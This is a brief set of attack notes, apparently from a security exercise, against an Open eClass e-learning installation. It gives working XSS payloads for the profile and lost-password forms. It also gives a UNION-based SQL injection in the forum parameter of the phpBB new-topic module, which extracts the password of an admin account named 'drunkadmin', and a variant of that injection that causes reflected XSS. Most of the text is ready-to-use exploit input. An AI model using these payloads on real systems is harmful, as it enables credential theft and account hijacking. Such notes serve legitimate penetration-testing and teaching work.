In /modules/profile/profile.php we set
uname= <img src="\xC2\xA0javascript:javascript:alert(1)">
pass = onerror="javascript:**attack_script()**"
In /modules/phpbb/newtopic.php
we set the forum variable to forum=') union select password, 2, 3 from eclass.user where username='drunkadmin'--+
and we get the admin password in the path
Χαρτοφυλάκιο χρήστη » How to get hacked fast <3 » Περιοχές Συζητήσεων » pass_hash » Νέο θέμα
In the same spirit we can set forum=') union select '<script>malicious_code()</script>', 2, 3 from eclass.user where username='drunkadmin'--+
and we get a Reflected XSS attack
In /modules/auth/lostpass.php we can set
uname = <script>malicious_code()</script>
email: some@valid.mail
and execute javascript code